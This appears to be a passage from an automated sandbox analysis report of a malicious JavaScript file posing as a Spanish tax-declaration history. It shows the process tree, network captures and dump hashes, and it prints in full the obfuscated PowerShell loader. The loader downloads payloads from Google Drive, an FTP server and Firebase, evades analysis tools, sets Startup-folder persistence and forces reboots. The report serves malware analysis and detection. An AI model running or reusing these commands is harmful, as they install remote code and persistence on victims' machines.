;$nKvfY = [System.Convert]::FromBase64String( $nKvfY ) ;;;$nKvfY = [System.Text.Encoding]::Unicode.GetString( $nKvfY ) ;$nKvfY = $nKvfY.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js') ;powershell $nKvfY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$cIOeC = $host.Version.Major.Equals(2);If ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$qvjjf = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $Xumfi ) {$qvjjf = ($qvjjf + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$qvjjf = ($qvjjf + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$xxwtl = ( New-Object Net.WebClient ) ;$xxwtl.Encoding = [System.Text.Encoding]::UTF8 ;$xxwtl.DownloadFile($qvjjf, ($HzOMj + '\Upwin.msu') ) ;$UwfwZ = ( 'C:\Users\' + [Environment]::UserName );JCCGX = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$qbsqs = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $qbsqs ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''e2622eb94959-848b-e5c4-04dc-e72e429d=nekot&aidem=tla?txt.loguh/o/moc.topsppa.8e7e8-soiranollom/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\06122024_1551_04122024_Historial-Declcaraciones-vencidas-2022-2023.js'' , ''D DDInstallUtil'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2552
          • C:\Windows\system32\wusa.exe
            "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
            5⤵
            • Drops file in Windows directory
            PID:2152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2104
        • C:\Windows\system32\shutdown.exe
          "C:\Windows\system32\shutdown.exe" /r /t 0 /f
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:624
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:1496
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:2496

      Network

      • flag-us
        DNS
        drive.google.com
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        drive.google.com
        IN A
        Response
        drive.google.com
        IN A
        172.217.169.78
      • flag-gb
        GET
        https://drive.google.com/uc?export=download&id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV
        powershell.exe
        Remote address:
        172.217.169.78:443
        Request
        GET /uc?export=download&id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV HTTP/1.1
        Host: drive.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 303 See Other
        Content-Type: application/binary
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 06 Dec 2024 15:51:55 GMT
        Location: https://drive.usercontent.google.com/download?id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV&export=download
        Strict-Transport-Security: max-age=31536000
        Content-Security-Policy: script-src 'report-sample' 'nonce-4yY7YsQfUcg8VqrZAFYUNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Cross-Origin-Opener-Policy: same-origin
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Server: ESF
        Content-Length: 0
        X-XSS-Protection: 0
        X-Frame-Options: SAMEORIGIN
        X-Content-Type-Options: nosniff
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • flag-us
        DNS
        drive.usercontent.google.com
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        drive.usercontent.google.com
        IN A
        Response
        drive.usercontent.google.com
        IN A
        216.58.212.193
      • flag-gb
        GET
        https://drive.usercontent.google.com/download?id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV&export=download
        powershell.exe
        Remote address:
        216.58.212.193:443
        Request
        GET /download?id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV&export=download HTTP/1.1
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Content-Type: text/html; charset=utf-8
        Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
        Content-Security-Policy: sandbox allow-scripts allow-forms allow-downloads
        Content-Security-Policy: script-src 'report-sample' 'nonce-3pMHj4-SJqwbEVfz1e-vbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 06 Dec 2024 15:52:24 GMT
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Cross-Origin-Opener-Policy: same-origin
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Cross-Origin-Resource-Policy: same-site
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmLw05BicEqfwRoCxKt_nmNdD8S7rM6zHgDiPZuANBAL8XDs2H1mF5vAhM9_JjEpqSblF8anFGWWpWaUlBQkFmQWpxaVpRbFGxkYmRgaGlnoGRjFFxgAANC7JBw"
        Content-Length: 2441
        X-GUploader-UploadID: AFiumC7oYr6vCdScKlGocJMFAq2uUXPoaL2WiHeO53zPPVAWx-LAIZ-zB1ywL0SQ7YQ7he1y3LT1q6KGVw
        Server: UploadServer
        Set-Cookie: NID=519=fjaGVlgITx0OkNGlEL8YRICNecp-fu-KudAijxTGQGAE6yvEQhVgyBwvq9lGFHHyOm9WDIO2XHJ69BO9vjnayYev60RH6aaeEymWYAQvTVmVdZ4h-NuCv0H_fuVCJvJaVZ6aSzlQ5YtEg-MmbLpHmvu62fapf_qToXuxA8V7Mgu50NDz; expires=Sat, 07-Jun-2025 15:51:55 GMT; path=/; domain=.google.com; HttpOnly
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • 172.217.169.78:443
        https://drive.google.com/uc?export=download&id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV
        tls, http
        powershell.exe
        851 B
         8.4kB
         10
        11

        HTTP Request

        GET https://drive.google.com/uc?export=download&id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV

        HTTP Response

        303
      • 216.58.212.193:443
        https://drive.usercontent.google.com/download?id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV&export=download
        tls, http
        powershell.exe
        971 B
         9.4kB
         12
        14

        HTTP Request

        GET https://drive.usercontent.google.com/download?id=1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV&export=download

        HTTP Response

        200
      • 8.8.8.8:53
        drive.google.com
        dns
        powershell.exe
        62 B
         78 B
         1
        1

        DNS Request

        drive.google.com

        DNS Response

        172.217.169.78

      • 8.8.8.8:53
        drive.usercontent.google.com
        dns
        powershell.exe
        74 B
         90 B
         1
        1

        DNS Request

        drive.usercontent.google.com

        DNS Response

        216.58.212.193

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        8777934afd1d33d8eb92276c97cffa57

        SHA1

        5c8c8cf33c5ceb026dc5723c50672787667684a7

        SHA256

        1e44a8193d3b69b9a57ccf5633e6f5e64a048bd8c20fa024540a5feb1fd2d0b9

        SHA512

        14f66f0c3d90de5c957c917c23bbb4ee0f431b95553957ab02a41df310d1f911befae7aa05e5892fd71e9c171b1c78a7933b358265fc7e3a946e154c8732fdab

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        d0dcf742d551acbe95a35f47a84ef4f6

        SHA1

        00b622558f95685335f1445f879a9bf96c922e08

        SHA256

        1bcf4790481d154634a9ad61c7f98a0c7eeb445f497040df86bde0a182a21b0b

        SHA512

        1df55ed56f97594d93599b23f995277587e1d70e30c889303f9dca3fbbe76d9b7fb1e7b3e265ca3e8bc39cc488143163c2c532e4eebc70a02229689913337637

        Download Submit

      • memory/1672-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1672-5-0x000000001B710000-0x000000001B9F2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1672-6-0x0000000000300000-0x0000000000308000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1672-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1672-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1672-14-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1672-15-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1672-16-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1672-17-0x000007FEF638E000-0x000007FEF638F000-memory.dmp

        Filesize

        4KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.